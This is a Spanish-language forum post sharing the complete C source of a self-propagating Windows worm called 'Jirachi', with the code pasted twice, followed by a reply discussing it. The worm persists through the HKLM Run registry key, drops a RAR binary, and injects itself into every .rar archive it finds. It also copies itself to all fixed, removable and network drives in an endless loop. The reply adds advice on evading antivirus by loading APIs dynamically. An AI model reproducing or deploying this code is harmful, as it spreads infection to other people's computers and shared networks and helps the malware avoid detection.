Autor
Aquí les dejo el code:
http://www.megaupload.com/?d=LJN95HTI
Código:
#include <windows.h>
#include "Rar binary.c"
#include "Image.c"
void Drop_file(char *File, char *Data, long Data_size);
void Execute(char *Program);
void Check_folder(char *Folder);
void Check_rar(char *File);
char Worm_name[] = "Jirachi";
char Run_key[] = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
char Worm_exe[] = "\\Jirachi.exe";
char Rar_exe[] = "\\Jirachi-Rar.exe";
char Root[] = "\x00:\\";
char Image_name[] = "Jirachi.gif";
char All_files[] = "*.*";
char Bar[] = "\\";
char Rar_file[] = ".rar";
char Quotes[] = "\"";
char Rar_params[] = "\" a -ep \"";
char Space[] = "\" \"";
char Worm_path[MAX_PATH];
char Rar_copy[MAX_PATH];
int main()
{
HANDLE Mutex_handle;
HKEY Key_handle;
HMODULE My_handle;
char System_path[MAX_PATH];
char Worm_copy[MAX_PATH];
UINT Drive_type;
char Image_copy[MAX_PATH];
Mutex_handle = CreateMutex(0, 0, Worm_name);
if (GetLastError() != ERROR_SUCCESS) return 0;
My_handle = GetModuleHandle(NULL);
if (My_handle == NULL) return 0;
if (GetModuleFileName(My_handle, Worm_path, MAX_PATH) == 0) return 0;
if (GetSystemDirectory(System_path, MAX_PATH) == 0) return 0;
strcpy(Rar_copy, System_path);
strcat(Rar_copy, Rar_exe);
Drop_file(Rar_copy, Rar_binary, sizeof(Rar_binary) - 1);
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, Run_key, 0, KEY_QUERY_VALUE + KEY_SET_VALUE, &Key_handle) != ERROR_SUCCESS) return 0;
if (RegQueryValueEx(Key_handle, Worm_name, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
{
RegCloseKey(Key_handle);
for (Root[0] = 'C'; Root[0] <= 'Z'; Root[0]++)
{
Drive_type = GetDriveType(Root);
if ((Drive_type == DRIVE_REMOVABLE) || (Drive_type == DRIVE_FIXED) || (Drive_type == DRIVE_REMOTE)) Check_folder(Root);
}
while (TRUE)
{
for (Root[0] = 'C'; Root[0] <= 'Z'; Root[0]++)
{
Drive_type = GetDriveType(Root);
if ((Drive_type == DRIVE_REMOVABLE) || (Drive_type == DRIVE_FIXED) || (Drive_type == DRIVE_REMOTE))
{
strcpy(Worm_copy, Root);
strcat(Worm_copy, &Worm_exe[1]);
CopyFile(Worm_path, Worm_copy, TRUE);
SetFileAttributes(Worm_copy, FILE_ATTRIBUTE_READONLY);
strcpy(Image_copy, Root);
strcat(Image_copy, Image_name);
Drop_file(Image_copy, Image_binary, sizeof(Image_binary) -1);
}
}
Sleep(5000);
}
}
else
{
strcpy(Worm_copy, System_path);
strcat(Worm_copy, Worm_exe);
if (CopyFile(Worm_path, Worm_copy, TRUE) == 0) return 0;
SetFileAttributes(Worm_copy, FILE_ATTRIBUTE_READONLY);
if (RegSetValueEx(Key_handle, Worm_name, 0, REG_SZ, Worm_copy, strlen(Worm_copy)) != ERROR_SUCCESS) return 0;
RegCloseKey(Key_handle);
CloseHandle(Mutex_handle);
Execute(Worm_copy);
}
return 0;
}
void Drop_file(char *File, char *Data, long Data_size)
{
HANDLE My_handle;
DWORD Bytes_written;
My_handle = CreateFile(File, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_READONLY, NULL);
if (My_handle == INVALID_HANDLE_VALUE) return;
WriteFile(My_handle, Data, Data_size, &Bytes_written, NULL);
CloseHandle(My_handle);
return;
}
void Execute(char *Program)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
if (CreateProcess(NULL, Program, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi) == 0) return;
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return;
}
void Check_folder(char *Folder)
{
char Find_all_files[MAX_PATH];
WIN32_FIND_DATA WFD;
HANDLE Find_handle;
char File[MAX_PATH];
char Extension[5];
strcpy(Find_all_files, Folder);
strcat(Find_all_files, All_files);
Find_handle = FindFirstFile(Find_all_files, &WFD);
if (WFD.cFileName[0] != '.')
{
strcpy(File, Folder);
strcat(File, WFD.cFileName);
if ((WFD.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) == FILE_ATTRIBUTE_DIRECTORY)
{
strcat(File, Bar);
Check_folder(File);
}
if ((WFD.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE) == FILE_ATTRIBUTE_ARCHIVE)
{
strcpy(Extension, &File[strlen(File) - 4]);
CharLower(Extension);
if (strcmp(Extension, Rar_file) == 0)
{
Check_rar(File);
}
}
}
while (FindNextFile(Find_handle, &WFD))
{
if (WFD.cFileName[0] != '.')
{
strcpy(File, Folder);
strcat(File, WFD.cFileName);
if ((WFD.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) == FILE_ATTRIBUTE_DIRECTORY)
{
strcat(File, Bar);
Check_folder(File);
}
if ((WFD.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE) == FILE_ATTRIBUTE_ARCHIVE)
{
strcpy(Extension, &File[strlen(File) - 4]);
CharLower(Extension);
if (strcmp(Extension, Rar_file) == 0)
{
Check_rar(File);
}
}
}
}
FindClose(Find_handle);
return;
}
void Check_rar(char *File)
{
char Command[MAX_PATH * 3];
strcpy(Command, Quotes);
strcat(Command, Rar_copy);
strcat(Command, Rar_params);
strcat(Command, File);
strcat(Command, Space);
strcat(Command, Worm_path);
strcat(Command, Quotes);
Execute(Command);
return;
}
#include "Rar binary.c"
#include "Image.c"
void Drop_file(char *File, char *Data, long Data_size);
void Execute(char *Program);
void Check_folder(char *Folder);
void Check_rar(char *File);
char Worm_name[] = "Jirachi";
char Run_key[] = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
char Worm_exe[] = "\\Jirachi.exe";
char Rar_exe[] = "\\Jirachi-Rar.exe";
char Root[] = "\x00:\\";
char Image_name[] = "Jirachi.gif";
char All_files[] = "*.*";
char Bar[] = "\\";
char Rar_file[] = ".rar";
char Quotes[] = "\"";
char Rar_params[] = "\" a -ep \"";
char Space[] = "\" \"";
char Worm_path[MAX_PATH];
char Rar_copy[MAX_PATH];
int main()
{
HANDLE Mutex_handle;
HKEY Key_handle;
HMODULE My_handle;
char System_path[MAX_PATH];
char Worm_copy[MAX_PATH];
UINT Drive_type;
char Image_copy[MAX_PATH];
Mutex_handle = CreateMutex(0, 0, Worm_name);
if (GetLastError() != ERROR_SUCCESS) return 0;
My_handle = GetModuleHandle(NULL);
if (My_handle == NULL) return 0;
if (GetModuleFileName(My_handle, Worm_path, MAX_PATH) == 0) return 0;
if (GetSystemDirectory(System_path, MAX_PATH) == 0) return 0;
strcpy(Rar_copy, System_path);
strcat(Rar_copy, Rar_exe);
Drop_file(Rar_copy, Rar_binary, sizeof(Rar_binary) - 1);
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, Run_key, 0, KEY_QUERY_VALUE + KEY_SET_VALUE, &Key_handle) != ERROR_SUCCESS) return 0;
if (RegQueryValueEx(Key_handle, Worm_name, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
{
RegCloseKey(Key_handle);
for (Root[0] = 'C'; Root[0] <= 'Z'; Root[0]++)
{
Drive_type = GetDriveType(Root);
if ((Drive_type == DRIVE_REMOVABLE) || (Drive_type == DRIVE_FIXED) || (Drive_type == DRIVE_REMOTE)) Check_folder(Root);
}
while (TRUE)
{
for (Root[0] = 'C'; Root[0] <= 'Z'; Root[0]++)
{
Drive_type = GetDriveType(Root);
if ((Drive_type == DRIVE_REMOVABLE) || (Drive_type == DRIVE_FIXED) || (Drive_type == DRIVE_REMOTE))
{
strcpy(Worm_copy, Root);
strcat(Worm_copy, &Worm_exe[1]);
CopyFile(Worm_path, Worm_copy, TRUE);
SetFileAttributes(Worm_copy, FILE_ATTRIBUTE_READONLY);
strcpy(Image_copy, Root);
strcat(Image_copy, Image_name);
Drop_file(Image_copy, Image_binary, sizeof(Image_binary) -1);
}
}
Sleep(5000);
}
}
else
{
strcpy(Worm_copy, System_path);
strcat(Worm_copy, Worm_exe);
if (CopyFile(Worm_path, Worm_copy, TRUE) == 0) return 0;
SetFileAttributes(Worm_copy, FILE_ATTRIBUTE_READONLY);
if (RegSetValueEx(Key_handle, Worm_name, 0, REG_SZ, Worm_copy, strlen(Worm_copy)) != ERROR_SUCCESS) return 0;
RegCloseKey(Key_handle);
CloseHandle(Mutex_handle);
Execute(Worm_copy);
}
return 0;
}
void Drop_file(char *File, char *Data, long Data_size)
{
HANDLE My_handle;
DWORD Bytes_written;
My_handle = CreateFile(File, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_READONLY, NULL);
if (My_handle == INVALID_HANDLE_VALUE) return;
WriteFile(My_handle, Data, Data_size, &Bytes_written, NULL);
CloseHandle(My_handle);
return;
}
void Execute(char *Program)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
if (CreateProcess(NULL, Program, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi) == 0) return;
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return;
}
void Check_folder(char *Folder)
{
char Find_all_files[MAX_PATH];
WIN32_FIND_DATA WFD;
HANDLE Find_handle;
char File[MAX_PATH];
char Extension[5];
strcpy(Find_all_files, Folder);
strcat(Find_all_files, All_files);
Find_handle = FindFirstFile(Find_all_files, &WFD);
if (WFD.cFileName[0] != '.')
{
strcpy(File, Folder);
strcat(File, WFD.cFileName);
if ((WFD.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) == FILE_ATTRIBUTE_DIRECTORY)
{
strcat(File, Bar);
Check_folder(File);
}
if ((WFD.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE) == FILE_ATTRIBUTE_ARCHIVE)
{
strcpy(Extension, &File[strlen(File) - 4]);
CharLower(Extension);
if (strcmp(Extension, Rar_file) == 0)
{
Check_rar(File);
}
}
}
while (FindNextFile(Find_handle, &WFD))
{
if (WFD.cFileName[0] != '.')
{
strcpy(File, Folder);
strcat(File, WFD.cFileName);
if ((WFD.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) == FILE_ATTRIBUTE_DIRECTORY)
{
strcat(File, Bar);
Check_folder(File);
}
if ((WFD.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE) == FILE_ATTRIBUTE_ARCHIVE)
{
strcpy(Extension, &File[strlen(File) - 4]);
CharLower(Extension);
if (strcmp(Extension, Rar_file) == 0)
{
Check_rar(File);
}
}
}
}
FindClose(Find_handle);
return;
}
void Check_rar(char *File)
{
char Command[MAX_PATH * 3];
strcpy(Command, Quotes);
strcat(Command, Rar_copy);
strcat(Command, Rar_params);
strcat(Command, File);
strcat(Command, Space);
strcat(Command, Worm_path);
strcat(Command, Quotes);
Execute(Command);
return;
}
En línea
pues aparte de lo que dijo R.N.A agrego que requiere privilegios pero con la gran cantidad de instalaciones default que hay por alli eso no debe ser problema para los AV tienes que llamar las Apis dinamicamente desde las dll como es un solo thread no debe de ser problema, Usaste Recursividad 
eso es de resaltar 
En fin me parece bueno el source 
